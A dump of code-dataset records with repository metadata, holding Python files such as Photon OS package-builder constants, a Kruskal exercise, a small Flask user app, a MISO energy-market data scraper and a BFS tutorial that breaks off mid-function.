     \"mpfr\",\n        \"mpc\",\n        \"libgcc\",\n        \"libstdc++\",\n        \"libgomp\",\n        \"gcc\",\n        \"pkg-config\",\n        \"ncurses\",\n        \"readline\",\n        \"bash\"]\n\n    # These packages will be built in a second stage to replace the published RPMs\n    listToolChainPackages=[\n        \"filesystem\",\n        \"linux-api-headers\",\n        \"glibc\",\n        \"zlib\",\n        \"file\",\n        \"binutils\",\n        \"gmp\",\n        \"mpfr\",\n        \"mpc\",\n        \"gcc\",\n        \"pkg-config\",\n        \"ncurses\",\n        \"bash\",\n        \"bzip2\",\n        \"sed\",\n        \"procps-ng\",\n        \"coreutils\",\n        \"m4\",\n        \"grep\",\n        \"readline\",\n        \"diffutils\",\n        \"gawk\",\n        \"findutils\",\n        \"gettext\",\n        \"gzip\",\n        \"make\",\n        \"patch\",\n        \"util-linux\",\n        \"tar\",\n        \"xz\",\n        \"libtool\",\n        \"flex\",\n        \"bison\",\n        \"lua\",\n        \"popt\",\n        \"nspr\",\n        \"sqlite-autoconf\",\n        \"nss\",\n        \"elfutils\",\n        \"expat\",\n        \"libffi\",\n        \"libpipeline\",\n        \"gdbm\",\n        \"perl\",\n        \"texinfo\",\n        \"autoconf\",\n        \"automake\",\n        \"openssl\",\n        \"python2\",\n        \"rpm\",\n        \"groff\",\n        \"man-pages\",\n        \"cpio\"]\n\n    # List of RPMs that will be installed in a chroot prior to building each\n    # package. 
On a stage1 and stage2 published rpms will/might be used\n # after stage2 only local RPMS will be used\n listToolChainRPMsToInstall=[\n \"filesystem\",\n \"linux-api-headers\",\n \"glibc\",\n \"glibc-devel\",\n \"zlib\",\n \"zlib-devel\",\n \"file\",\n \"binutils\",\n \"binutils-devel\",\n \"gmp\",\n \"gmp-devel\",\n \"mpfr\",\n \"mpfr-devel\",\n \"mpc\",\n \"libgcc\",\n \"libgcc-devel\",\n \"libstdc++\",\n \"libstdc++-devel\",\n \"libgomp\",\n \"libgomp-devel\",\n \"gcc\",\n \"pkg-config\",\n \"ncurses\",\n \"bash\",\n \"bzip2\",\n \"bzip2-devel\",\n \"sed\",\n \"ncurses-devel\",\n \"procps-ng\",\n \"coreutils\",\n \"m4\",\n \"grep\",\n \"readline\",\n \"diffutils\",\n \"gawk\",\n \"findutils\",\n \"gettext\",\n \"gzip\",\n \"make\",\n \"patch\",\n \"util-linux\",\n \"util-linux-devel\",\n \"tar\",\n \"xz\",\n \"libtool\",\n \"flex\",\n \"flex-devel\",\n \"bison\",\n \"readline-devel\",\n \"lua\",\n \"lua-devel\",\n \"popt\",\n \"popt-devel\",\n \"nspr\",\n \"sqlite-autoconf\",\n \"sqlite-libs\",\n \"nss\",\n \"nss-devel\",\n \"elfutils-libelf\",\n \"elfutils\",\n \"elfutils-libelf-devel\",\n \"elfutils-devel\",\n \"expat\",\n \"libffi\",\n \"libpipeline\",\n \"gdbm\",\n \"perl\",\n \"texinfo\",\n \"autoconf\",\n \"automake\",\n \"openssl\",\n \"openssl-devel\",\n \"python2\",\n \"python2-libs\",\n \"python2-devel\",\n \"libcap\",\n \"rpm\",\n \"rpm-build\",\n \"rpm-devel\",\n \"rpm-libs\",\n \"groff\",\n \"man-pages\",\n \"cpio\",\n \"go\"]\n\n # List of RPMs which are not published. They will be created during the\n # build process\n listOfRPMsProvidedAfterBuild=[\n \"util-linux-devel\",\n \"flex-devel\",\n \"sqlite-libs\",\n \"rpm-libs\"]\n\n # List of packages that will be installed in addition for each\n # package to make check\n listMakeCheckRPMPkgtoInstall=[\n \"python2\",\n \"python2-devel\",\n \"python2-libs\",\n \"python2-tools\",\n \"libffi\",\n \"python-setuptools\",\n \"ca-certificates\",\n \"linux\",\n \"createrepo\",\n \"sudo\",\n \"ruby\",\n \"curl\",\n \"pcre-devel\",\n \"boost-devel\",\n \"which\",\n \"go\",\n \"e2fsprogs-devel\",\n \"shadow\",\n \"check\",\n \"libacl-devel\",\n \"device-mapper\",\n \"wget\",\n \"tar\",\n \"pkg-config\",\n \"git\",\n \"openssl\",\n \"openssl-devel\",\n \"net-tools\",\n \"less\",\n \"yum-metadata-parser\",\n \"yum\",\n \"rpm-devel\",\n \"rpm\",\n \"libxml2\",\n \"python-xml\",\n \"libacl\",\n \"tzdata\",\n \"libgcrypt-devel\",\n \"Linux-PAM\",\n \"unzip\"]\n\n @staticmethod\n def initialize(options):\n constants.dist = options.dist\n constants.buildNumber = options.buildNumber\n constants.releaseVersion = options.releaseVersion\n constants.specPath = options.specPath\n constants.sourcePath = options.sourcePath\n constants.rpmPath = options.rpmPath\n constants.sourceRpmPath = options.sourceRpmPath\n constants.topDirPath = options.topDirPath\n constants.logPath = options.logPath\n constants.prevPublishRPMRepo=options.publishRPMSPath\n constants.buildRootPath=options.buildRootPath\n constants.specData = SerializableSpecObjectsUtils(constants.logPath)\n constants.specData.readSpecsAndConvertToSerializableObjects(constants.specPath)\n constants.pullsourcesConfig = options.pullsourcesConfig\n constants.inputRPMSPath=options.inputRPMSPath\n constants.updateRPMMacros()\n constants.testForceRPMS=[]\n constants.rpmCheck = options.rpmCheck\n constants.rpmCheckStopOnError = options.rpmCheckStopOnError\n if constants.rpmCheck:\n constants.testLogger=Logger.getLogger(\"MakeCheckTest\",constants.logPath)\n\n @staticmethod\n def updateRPMMacros():\n 
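# Register distribution, build-number, release-version and kernel version/release macros on the shared spec data.\n        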
#adding distribution rpm macro\n        constants.specData.addMacro(\"dist\",constants.dist)\n\n        #adding buildnumber rpm macro\n        constants.specData.addMacro(\"photon_build_number\",constants.buildNumber)\n\n        #adding releasenumber rpm macro\n        constants.specData.addMacro(\"photon_release_version\",constants.releaseVersion)\n\n        #adding kernelversion rpm macro\n        kernelversion = constants.specData.getVersion(\"linux\")\n        constants.specData.addMacro(\"KERNEL_VERSION\",kernelversion)\n\n        #adding kernelrelease rpm macro\n        kernelrelease = constants.specData.getRelease(\"linux\")\n        constants.specData.addMacro(\"KERNEL_RELEASE\",kernelrelease)\n        \n        #adding kernelsubrelease rpm macro\n        kernelversion = kernelversion.replace(\".\",\"\")\n        if kernelversion.isdigit():\n            kernelversion = int(kernelversion) << 8\n        kernelsubrelease = str(kernelversion)+kernelrelease\n        kernelsubrelease = kernelsubrelease.replace(constants.dist,\"\")\n        if kernelsubrelease:\n            kernelsubrelease = \".\"+kernelsubrelease\n        constants.specData.addMacro(\"kernelsubrelease\",kernelsubrelease)\n\n    @staticmethod\n    def setTestForceRPMS(listsPackages):\n        constants.testForceRPMS=listsPackages\n","repo_name":"trumland/photon","sub_path":"support/package-builder/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":7583,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"40"} +{"seq_id":"74512284281","text":"# function that finds a node's own parent (root)\ndef find_set(x):\n    while x != p[x]:\n        x = p[x]\n    return x\n\n# set y's parent to x's parent\ndef union(x, y):\n    p[find_set(y)] = find_set(x)\n\ndef kruskal(arr):\n    cnt = 0\n    for s, e, w in arr:\n        # if no cycle is formed, i.e. the parents differ\n        if find_set(s) != find_set(e):\n            cnt += w\n            union(s, e)\n    return cnt\n\nV, E = map(int, input().split())\nedges = [list(map(int, input().split())) for _ in range(E)]\n# sort ascending by distance (weight)\nedges = sorted(edges, key=lambda x: x[2])\np = list(range(V+1))\nkruskal(edges)","repo_name":"gyoforit/study-algorithm","sub_path":"etc/review_kruskal.py","file_name":"review_kruskal.py","file_ext":"py","file_size_in_byte":620,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"40999810861","text":"import random\narr1 = []\narr2 = [[],[],[]]\narr3 = []\narr4 = []\narr5 = []\n\narr1.insert(0, 3)\narr1.insert(1, 7)\narr1.insert(2, 1)\narr1.insert(3, 0)\narr1.insert(4, 4)\n\narr2[0].insert(0, 2)\narr2[0].insert(1,3)\narr2[1].insert(0,7)\narr2[1].insert(1,1)\narr2[2].insert(0,0)\narr2[2].insert(1,4)\n\nfor i in range(7):\n    arr3.insert(i, 5)\n    \nfor j in range (1, 10):\n    arr4.insert(j, j)\n\nfor x in range(10):\n    arr5.insert(x, random.randint(1,20))\nprint(arr1)\nprint(arr2)\nprint(arr3)\nprint(arr4)\nprint(arr5)","repo_name":"OwcaGaming/pp1","sub_path":"06-Arrays/ex19.py","file_name":"ex19.py","file_ext":"py","file_size_in_byte":499,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"40"} +{"seq_id":"2176498839","text":"from flask import Flask,render_template,request,redirect\n\nfrom users import User\n\napp = Flask(__name__)\n\n@app.route('/')\ndef index():\n    return redirect('/read')\n\n@app.route('/read')\ndef read_all():\n    user_list = User.get_all()\n    return render_template(\"read.html\",user_list = user_list)\n\n@app.route('/new')\ndef new_user():\n    return render_template (\"create.html\")\n\n@app.route('/create',methods=[\"POST\"])\ndef create():\n    data = {\n    \"fname\": request.form[\"fname\"],\n    \"lname\" : request.form[\"lname\"],\n    \"email\" : request.form[\"email\"]\n    }\n    User.save(data)\n    
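# After saving the new user, return to the index route, which redirects to /read.\n    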
return redirect('/')\n\nif __name__ == \"__main__\":\n    app.run(debug = True)","repo_name":"ChewChuenChan/user_cr","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":664,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"28217503827","text":"count = 0\r\ndef symmetry(n,a): \r\n    global count\r\n    if n%2 == 0:\r\n        mid = int(n/2)\r\n        half1 = a[0 : mid ]\r\n        half2 = a[ mid : n]\r\n        if half1 == half2 :\r\n            count = count + 1\r\n            symmetry(mid, a)\r\n     \r\n    return count\r\n\r\nstring = input()\r\nlength = int(input())\r\nprint(symmetry(length, string))","repo_name":"shruthi-kumaravel/spiderinductionsalgos","sub_path":"task1_q2.py","file_name":"task1_q2.py","file_ext":"py","file_size_in_byte":284,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"39698759995","text":"# Author: Omkar Sunkersett\n# Purpose: To fetch MISO data and update the database\n# Summer Internship at Argonne National Laboratory\n\nimport csv, datetime, MySQLdb, os, requests, time\n\nclass MISO():\n\tdef __init__(self, base_url, file_nom, file_ext, prog_dir):\n\t\tself.base_url = base_url\n\t\tself.file_nom = file_nom\n\t\tself.file_ext = file_ext\n\t\tself.prog_dir = prog_dir\n\t\tself.files_cached = []\n\n\tdef fetch_files(self, market_run_id, start_dt, end_dt):\n\t\ttry:\n\t\t\tstart_year = int(start_dt.split('-')[2])\n\t\t\tstart_month = int(start_dt.split('-')[0])\n\t\t\tstart_day = int(start_dt.split('-')[1])\n\t\t\tend_year = int(end_dt.split('-')[2])\n\t\t\tend_month = int(end_dt.split('-')[0])\n\t\t\tend_day = int(end_dt.split('-')[1])\n\n\t\t\tfor year in range(start_year, end_year+1):\n\t\t\t\tif year == end_year:\n\t\t\t\t\tmax_months = end_month\n\t\t\t\telse:\n\t\t\t\t\tmax_months = 12\n\t\t\t\tfor month in range(start_month, max_months+1):\n\t\t\t\t\tif month == end_month and year == end_year:\n\t\t\t\t\t\tmax_days = end_day\n\t\t\t\t\telif month in [1, 3, 5, 7, 8, 10, 12]:\n\t\t\t\t\t\tmax_days = 31\n\t\t\t\t\telif month in [4, 6, 9, 11]:\n\t\t\t\t\t\tmax_days = 30\n\t\t\t\t\telif month == 2 and year % 4 == 0:\n\t\t\t\t\t\tmax_days = 29\n\t\t\t\t\telse:\n\t\t\t\t\t\tmax_days = 28\n\t\t\t\t\tfor day in range(start_day, max_days+1):\n\t\t\t\t\t\tfile_name = str(year) + str(month).zfill(2) + str(day).zfill(2) + self.file_nom + self.file_ext\n\t\t\t\t\t\tresponse = requests.get(self.base_url + '/' + file_name)\n\t\t\t\t\t\tif response.status_code == 200:\n\t\t\t\t\t\t\tif os.path.isdir(self.prog_dir + '\\\\cache\\\\miso\\\\' + market_run_id + '\\\\' + str(year) + '\\\\' + str(month) + '\\\\' + str(day)) == False:\n\t\t\t\t\t\t\t\tos.makedirs(self.prog_dir + '\\\\cache\\\\miso\\\\' + market_run_id + '\\\\' + str(year) + '\\\\' + str(month) + '\\\\' + str(day))\n\t\t\t\t\t\t\tos.chdir(self.prog_dir + '\\\\cache\\\\miso\\\\' + market_run_id + '\\\\' + str(year) + '\\\\' + str(month) + '\\\\' + str(day))\n\t\t\t\t\t\t\tfwrite = open(file_name, 'wb')\n\t\t\t\t\t\t\tfwrite.write(response.content)\n\t\t\t\t\t\t\tfwrite.close()\n\t\t\t\t\t\t\tself.files_cached.append(self.prog_dir + '\\\\cache\\\\miso\\\\' + market_run_id + '\\\\' + str(year) + '\\\\' + str(month) + '\\\\' + str(day) + '\\\\' + file_name)\n\t\t\t\t\t\t\tprint (\"Current File: \" + self.files_cached[-1])\n\t\t\t\t\t\t\ttime.sleep(6)\n\t\t\t\t\t\t\tos.chdir(self.prog_dir)\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tprint (\"File Not Found: \" + file_name)\n\t\t\t\t\tstart_day = 1\n\t\t\t\tstart_month = 1\n\t\texcept 
Exception as e:\n\t\t\tprint (str(e))\n\n\tdef etl_file_data(self, cache_file):\n\t\ttry:\n\t\t\tfread = open(cache_file, 'r')\n\t\t\tflines = [x.rstrip('\\n') for x in fread.readlines() if x.endswith('.csv\\n')]\n\t\t\tfread.close()\n\t\t\tcnx = MySQLdb.connect(user = 'not-published', passwd = 'not-published', host = 'not-published', db = 'not-published')\n\t\t\tcursor = cnx.cursor()\n\t\t\tcursor.execute(\"SELECT market_id FROM market_meta USE INDEX (PRIMARY) WHERE market_name = 'MISO'\")\n\t\t\tmkt_id = cursor.fetchone()[0]\n\t\t\ti = 1\n\t\t\tfor fname in flines:\n\t\t\t\tprint ('Current file: ' + fname + '\\t' + 'Percent complete: ' + str(round((float(i)*100)/len(flines), 2)) + ' %')\n\t\t\t\tfread = open(fname, 'r')\n\t\t\t\tfrows = csv.reader(fread, delimiter = ',')\n\t\t\t\tnext(frows, None)\n\t\t\t\toffer_base_rs = []\n\t\t\t\tins_perf = True\n\t\t\t\tfor row in frows:\n\t\t\t\t\tif len(row) > 0:\n\t\t\t\t\t\tif ins_perf == True:\n\t\t\t\t\t\t\tcursor.execute(\"SELECT offer_id, identifier_1, identifier_2 FROM offer_base USE INDEX (IDX_OFFER_BASE_MARKET_ID) WHERE market_id = %s\", (mkt_id,))\n\t\t\t\t\t\t\toffer_base_rs = list(cursor.fetchall())\n\t\t\t\t\t\t\tif len(offer_base_rs) > 0:\n\t\t\t\t\t\t\t\toff_check = [x for (x, y, z) in offer_base_rs if (row[1], row[2]) == (y, z)]\n\t\t\t\t\t\t\t\tif len(off_check) > 0:\n\t\t\t\t\t\t\t\t\toff_id = off_check[0]\n\t\t\t\t\t\t\t\t\tins_perf = False\n\t\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\t\tcursor.execute(\"INSERT INTO offer_base (identifier_1, identifier_2, region_name, market_id) VALUES (%s, %s, %s, %s)\", (row[1], row[2], row[0], mkt_id))\n\t\t\t\t\t\t\t\t\tins_perf = True\n\t\t\t\t\t\t\t\t\tcursor.execute(\"SELECT offer_id FROM offer_base USE INDEX (IDX_OFFER_BASE_ID1_ID2) WHERE identifier_1 = %s AND identifier_2 = %s\", (row[1], row[2]))\n\t\t\t\t\t\t\t\t\toff_id = cursor.fetchone()[0]\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\tcursor.execute(\"INSERT INTO offer_base (identifier_1, identifier_2, region_name, market_id) VALUES (%s, %s, %s, %s)\", (row[1], row[2], row[0], mkt_id))\n\t\t\t\t\t\t\t\tins_perf = True\n\t\t\t\t\t\t\t\tcursor.execute(\"SELECT offer_id FROM offer_base USE INDEX (IDX_OFFER_BASE_ID1_ID2) WHERE identifier_1 = %s AND identifier_2 = %s\", (row[1], row[2]))\n\t\t\t\t\t\t\t\toff_id = cursor.fetchone()[0]\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\toff_check = [x for (x, y, z) in offer_base_rs if (row[1], row[2]) == (y, z)]\n\t\t\t\t\t\t\tif len(off_check) > 0:\n\t\t\t\t\t\t\t\toff_id = off_check[0]\n\t\t\t\t\t\t\t\tins_perf = False\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\tcursor.execute(\"INSERT INTO offer_base (identifier_1, identifier_2, region_name, market_id) VALUES (%s, %s, %s, %s)\", (row[1], row[2], row[0], mkt_id))\n\t\t\t\t\t\t\t\tins_perf = True\n\t\t\t\t\t\t\t\tcursor.execute(\"SELECT offer_id FROM offer_base USE INDEX (IDX_OFFER_BASE_ID1_ID2) WHERE identifier_1 = %s AND identifier_2 = %s\", (row[1], row[2]))\n\t\t\t\t\t\t\t\toff_id = cursor.fetchone()[0]\n\n\t\t\t\t\t\tif fname.split('_')[2].lower() =='da':\n\t\t\t\t\t\t\tmrun_id = 'DAM'\n\t\t\t\t\t\telif fname.split('_')[2].lower() =='rt':\n\t\t\t\t\t\t\tmrun_id = 'RTM'\n\t\t\t\t\t\tintv_dt = row[3].split()[0].split('/')[2] + '-' + row[3].split()[0].split('/')[0].zfill(2) + '-' + row[3].split()[0].split('/')[1].zfill(2)\n\t\t\t\t\t\tintv_start = intv_dt + ' ' + row[3].split()[1].split(':')[0].zfill(2) + ':' + row[3].split()[1].split(':')[1].zfill(2) + ':00'\n\t\t\t\t\t\tintv_end = (datetime.datetime.strptime(intv_start, \"%Y-%m-%d %H:%M:%S\") + datetime.timedelta(hours 
= 1, minutes = 0)).strftime(\"%Y-%m-%d %H:%M:%S\")\n\t\t\t\t\t\thr, iv = (int(row[3].split()[1].split(':')[0]) + 1), 0\n\t\t\t\t\t\tintv_id = str(off_id) + '-' + mrun_id + '-' + intv_start[2:4] + intv_start[5:7] + intv_start[8:10] + intv_start[11:13] + intv_start[14:16]\n\n\t\t\t\t\t\tcursor.execute(\"INSERT INTO interval_meta (interval_id, offer_id, market_id, mkt_run_id, interval_dt, interval_start, interval_end, opr_hour, opr_interval) VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s)\", (intv_id, off_id, mkt_id, mrun_id, intv_dt, intv_start, intv_end, hr, iv))\n\n\t\t\t\t\t\tif mrun_id == 'DAM':\n\t\t\t\t\t\t\tcursor.execute(\"INSERT INTO miso_results (interval_id, reg_max, reg_min, regoff_price, regself_limit, spinoff_price, spinself_limit, onsupp_price, onsuppself_limit, offsupp_price, offsuppself_limit, regavg_mcp, regavg_cap, spinavg_mcp, spinavg_cap, suppavg_mcp, suppavg_cap) VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)\", (intv_id, float(row[5].zfill(1)), float(row[6].zfill(1)), float(row[7].zfill(1)), float(row[8].zfill(1)), float(row[9].zfill(1)), float(row[10].zfill(1)), float(row[11].zfill(1)), float(row[12].zfill(1)), float(row[13].zfill(1)), float(row[14].zfill(1)), float(row[15].zfill(1)), float(row[16].zfill(1)), float(row[17].zfill(1)), float(row[18].zfill(1)), float(row[19].zfill(1)), float(row[20].zfill(1))))\n\t\t\t\t\t\telif mrun_id == 'RTM':\n\t\t\t\t\t\t\tregmcp = (float(row[14].zfill(1)) + float(row[16].zfill(1)) + float(row[18].zfill(1)) + float(row[20].zfill(1)) + float(row[22].zfill(1)) + float(row[24].zfill(1)) + float(row[26].zfill(1)) + float(row[28].zfill(1)) + float(row[30].zfill(1)) + float(row[32].zfill(1)) + float(row[34].zfill(1)) + float(row[36].zfill(1))) / 12\n\t\t\t\t\t\t\tregcap = (float(row[15].zfill(1)) + float(row[17].zfill(1)) + float(row[19].zfill(1)) + float(row[21].zfill(1)) + float(row[23].zfill(1)) + float(row[25].zfill(1)) + float(row[27].zfill(1)) + float(row[29].zfill(1)) + float(row[31].zfill(1)) + float(row[33].zfill(1)) + float(row[35].zfill(1)) + float(row[37].zfill(1))) / 12\n\t\t\t\t\t\t\tspinmcp = (float(row[38].zfill(1)) + float(row[40].zfill(1)) + float(row[42].zfill(1)) + float(row[44].zfill(1)) + float(row[46].zfill(1)) + float(row[48].zfill(1)) + float(row[50].zfill(1)) + float(row[52].zfill(1)) + float(row[54].zfill(1)) + float(row[56].zfill(1)) + float(row[58].zfill(1)) + float(row[60].zfill(1))) / 12\n\t\t\t\t\t\t\tspincap = (float(row[39].zfill(1)) + float(row[41].zfill(1)) + float(row[43].zfill(1)) + float(row[45].zfill(1)) + float(row[47].zfill(1)) + float(row[49].zfill(1)) + float(row[51].zfill(1)) + float(row[53].zfill(1)) + float(row[55].zfill(1)) + float(row[57].zfill(1)) + float(row[59].zfill(1)) + float(row[61].zfill(1))) / 12\n\t\t\t\t\t\t\tsuppmcp = (float(row[62].zfill(1)) + float(row[64].zfill(1)) + float(row[66].zfill(1)) + float(row[68].zfill(1)) + float(row[70].zfill(1)) + float(row[72].zfill(1)) + float(row[74].zfill(1)) + float(row[76].zfill(1)) + float(row[78].zfill(1)) + float(row[80].zfill(1)) + float(row[82].zfill(1)) + float(row[84].zfill(1))) / 12\n\t\t\t\t\t\t\tsuppcap = (float(row[63].zfill(1)) + float(row[65].zfill(1)) + float(row[67].zfill(1)) + float(row[69].zfill(1)) + float(row[71].zfill(1)) + float(row[73].zfill(1)) + float(row[75].zfill(1)) + float(row[77].zfill(1)) + float(row[79].zfill(1)) + float(row[81].zfill(1)) + float(row[83].zfill(1)) + float(row[85].zfill(1))) / 12\n\t\t\t\t\t\t\tcursor.execute(\"INSERT INTO miso_results (interval_id, reg_max, reg_min, 
regoff_price, regself_limit, spinoff_price, spinself_limit, onsupp_price, onsuppself_limit, offsupp_price, offsuppself_limit, regavg_mcp, regavg_cap, spinavg_mcp, spinavg_cap, suppavg_mcp, suppavg_cap) VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)\", (intv_id, float(row[4].zfill(1)), float(row[5].zfill(1)), float(row[6].zfill(1)), float(row[7].zfill(1)), float(row[8].zfill(1)), float(row[9].zfill(1)), float(row[10].zfill(1)), float(row[11].zfill(1)), float(row[12].zfill(1)), float(row[13].zfill(1)), regmcp, regcap, spinmcp, spincap, suppmcp, suppcap))\n\t\t\t\tcnx.commit()\n\t\t\t\tfread.close()\n\t\t\t\ti += 1\n\t\t\tcursor.close()\n\t\t\tcnx.close()\n\t\texcept Exception as e:\n\t\t\tprint (str(e))\n\n\tdef __str__(self):\n\t\ttry:\n\t\t\tos.chdir(self.prog_dir + '\\\\cache\\\\miso')\n\t\t\tfwrite = open(self.file_nom[1:].replace('_', '-') + '.txt', 'w')\n\t\t\tfwrite.write('File(s) cached are as follows:\\n')\n\t\t\tfor file_name in self.files_cached:\n\t\t\t\tfwrite.write(file_name + '\\n')\n\t\t\tfwrite.close()\n\t\t\tos.chdir(self.prog_dir)\n\t\t\treturn (\"File(s) cached: \" + ', '.join(self.files_cached) + '\\n')\n\t\texcept Exception as e:\n\t\t\tprint (str(e))\n\ndef dbdt_check(mkt_name, start_dt, end_dt):\n\ttry:\n\t\tprint (\"\\nStarting the database date validation check...\\n\")\n\t\tcnx = MySQLdb.connect(user = 'not-published', passwd = 'not-published', host = 'not-published', db = 'not-published')\n\t\tcursor = cnx.cursor()\n\t\tcursor.execute(\"SELECT min(interval_dt) AS oldest_dt, max(interval_dt) AS latest_dt FROM interval_meta USE INDEX (IDX_INTERVAL_META_MARKET_ID) WHERE market_id = (SELECT DISTINCT market_id FROM market_meta USE INDEX (PRIMARY) WHERE lower(market_name) = %s)\", (mkt_name.lower(),))\n\t\trs = cursor.fetchone()\n\t\tcursor.close()\n\t\tcnx.close()\n\t\tprint(\"Database Oldest Date (MM-DD-YYYY): \" + datetime.datetime.strftime(rs[0], \"%m-%d-%Y\"))\n\t\tdbdt_start = datetime.datetime.strptime(datetime.datetime.strftime(rs[0], \"%Y-%m-%d\"), \"%Y-%m-%d\")\n\t\tprint(\"Database Latest Date (MM-DD-YYYY): \" + datetime.datetime.strftime(rs[1], \"%m-%d-%Y\"))\n\t\tdbdt_end = datetime.datetime.strptime(datetime.datetime.strftime(rs[1], \"%Y-%m-%d\"), \"%Y-%m-%d\")\n\t\tprint(\"Script Start Date (MM-DD-YYYY): \" + start_dt)\n\t\tstart_dt = datetime.datetime.strptime(start_dt.split('-')[2] + '-' + start_dt.split('-')[0] + '-' + start_dt.split('-')[1], \"%Y-%m-%d\")\n\t\tprint(\"Script End Date (MM-DD-YYYY): \" + end_dt)\n\t\tend_dt = datetime.datetime.strptime(end_dt.split('-')[2] + '-' + end_dt.split('-')[0] + '-' + end_dt.split('-')[1], \"%Y-%m-%d\")\n\t\tif start_dt == (dbdt_end + datetime.timedelta(hours = 24, minutes = 0)) and end_dt >= start_dt and end_dt <= datetime.datetime.strptime(datetime.datetime.strftime(datetime.datetime.now() - datetime.timedelta(hours = 24, minutes = 0), \"%Y-%m-%d\"), \"%Y-%m-%d\"):\n\t\t\tprint (\"\\nThe database date validation check has completed successfully. The program will now execute...\\n\")\n\t\t\treturn True\n\t\telse:\n\t\t\tactual_st = datetime.datetime.strftime(dbdt_end + datetime.timedelta(hours = 24, minutes = 0), \"%Y-%m-%d\")\n\t\t\tactual_ed = datetime.datetime.strftime(datetime.datetime.now() - datetime.timedelta(hours = 24, minutes = 0), \"%Y-%m-%d\")\n\t\t\tprint (\"\\nPlease check the script start and end dates properly. 
The start date must be set to \" + actual_st.split('-')[1] + '-' + actual_st.split('-')[2] + '-' + actual_st.split('-')[0] + \" (MM-DD-YYYY) and the end date must be less than or equal to \" + actual_ed.split('-')[1] + '-' + actual_ed.split('-')[2] + '-' + actual_ed.split('-')[0] + \" (MM-DD-YYYY) and also not less than the start date.\")\n\t\t\treturn False\n\texcept Exception as e:\n\t\tprint (str(e))\n\n\ndef main():\n\tprint (\"\\n********** Start of the Program **********\\n\")\n\n\t# prog_dir is the main directory under which the CSV files will be stored\n\t#prog_dir = \"C:\\\\Users\\\\Omkar Sunkersett\\\\Downloads\\\\markets\"\n\n\t# These respective variables set the start and end dates for fetching data from the server\n\t#startdatetime = \"MM-DD-YYYY\"\n\t#enddatetime = \"MM-DD-YYYY\"\n\n\tif dbdt_check(\"MISO\", startdatetime, enddatetime):\n\t\t# Code for fetching the CSV files from the server for both DA and RT markets\n\t\tasm_da_off = MISO(\"https://www.misoenergy.org/Library/Repository/Market Reports\", \"_asm_da_co\", \".csv\", prog_dir)\n\t\t#asm_da_off.fetch_files(\"da\", startdatetime, enddatetime)\n\t\t#print (asm_da_off)\n\n\t\tasm_rt_off = MISO(\"https://www.misoenergy.org/Library/Repository/Market Reports\", \"_asm_rt_co\", \".csv\", prog_dir)\n\t\t#asm_rt_off.fetch_files(\"rt\", startdatetime, enddatetime)\n\t\t#print (asm_rt_off)\n\n\t\t# Code for loading the CSV data into the not-published database for both DA and RT markets\n\t\t# IMPORTANT: Make sure you have the latest backup of the database before uncommenting the below lines\n\t\t#print (\"\\nLoading the new data into the database...\\n\")\n\t\t#asm_da_off.etl_file_data(prog_dir + \"\\\\cache\\\\miso\\\\asm-da-co.txt\")\n\t\t#asm_rt_off.etl_file_data(prog_dir + \"\\\\cache\\\\miso\\\\asm-rt-co.txt\")\n\n\tprint (\"\\n********** End of the Program **********\\n\")\n\n\nmain()\n","repo_name":"omkar-sunkersett/summer-internship","sub_path":"miso-final.py","file_name":"miso-final.py","file_ext":"py","file_size_in_byte":13824,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"41076188029","text":"# BFS \n\n# The BFS algorithm stands for 'breadth-first search'. Simply put, it explores the nearest nodes first. \n# DFS works by visiting the farthest reachable nodes first; BFS is the opposite.\n# It is implemented using a queue, a first-in first-out data structure.\n# If the algorithm repeatedly pushes adjacent nodes onto the queue, whatever entered first naturally leaves first, \n# so the search proceeds outward from the nearest nodes.\n\n# The algorithm behaves exactly as follows.\n\n# 1. Insert the start node into the queue and mark it as visited.\n# 2. Pop a node from the queue, insert all of its unvisited adjacent nodes into the queue, and mark them as visited.\n# 3. Repeat step 2 until it can no longer be performed.\n\nfrom collections import deque\n\ndef bfs(graph, start, visited):\n    # use deque to implement the queue\n    queue = deque([start])\n    # mark the current node as visited\n    visited[start] = True \n    \n    # repeat until the queue is empty\n    while queue:\n        # pop one element from the queue and print it\n        v = queue.popleft()\n        print(v, end = ' ')\n        # insert the unvisited elements connected to this one into the queue\n        for i in graph[v]:\n            if not visited[i]:\n                queue.append(i)\n                visited[i] = True\n\ngraph = [\n    [],\n    [2, 3, 8],\n    [1, 7],\n    [1, 4, 5],\n    [3, 5],\n    [3, 4],\n    [7],\n    [2, 6, 8],\n    [1, 7]\n]\n\nvisited = [False] * 9\n\nbfs(graph, 1, visited)\n\n\n\n\n\n\n# from collections import deque\n\n# queue = deque()\n\n# queue.append(5)\n# queue.append(2)\n# queue.append(3)\n# queue.append(7)\n# queue.popleft()\n# queue.append(1)\n# queue.append(4)\n# queue.popleft()\n\n# print(queue)\n# queue.reverse()\n# print(queue)\n\n\n\n\n\n# recursive functions\n\n# def recursive_function(i):\n#     if i == 10:\n#         return\n#     print(i, 'th recursive call invokes the', i+1, 'th recursive call.')\n#     recursive_function(i+1)\n#     print(i, 'th recursive call is ending')\n    \n# recursive_function(1) \n\n\n# def factorial_iterative(n):\n#     result = 1\n#     for i in range(1, n+1):\n#         result *= i\n#     return result \n\n# def factorial_recursive(n):\n#     if n <= 1:\n#         return 1\n#     return n * factorial_recursive(n-1)\n\n\n\nfrom collections import deque\n\ndef bfs(graph, start, visited):\n    # use deque to implement the queue\n    queue = deque([start])\n    # mark the current node as visited\n    visited[start] = True\n    \n    # repeat until the queue is empty\n    while 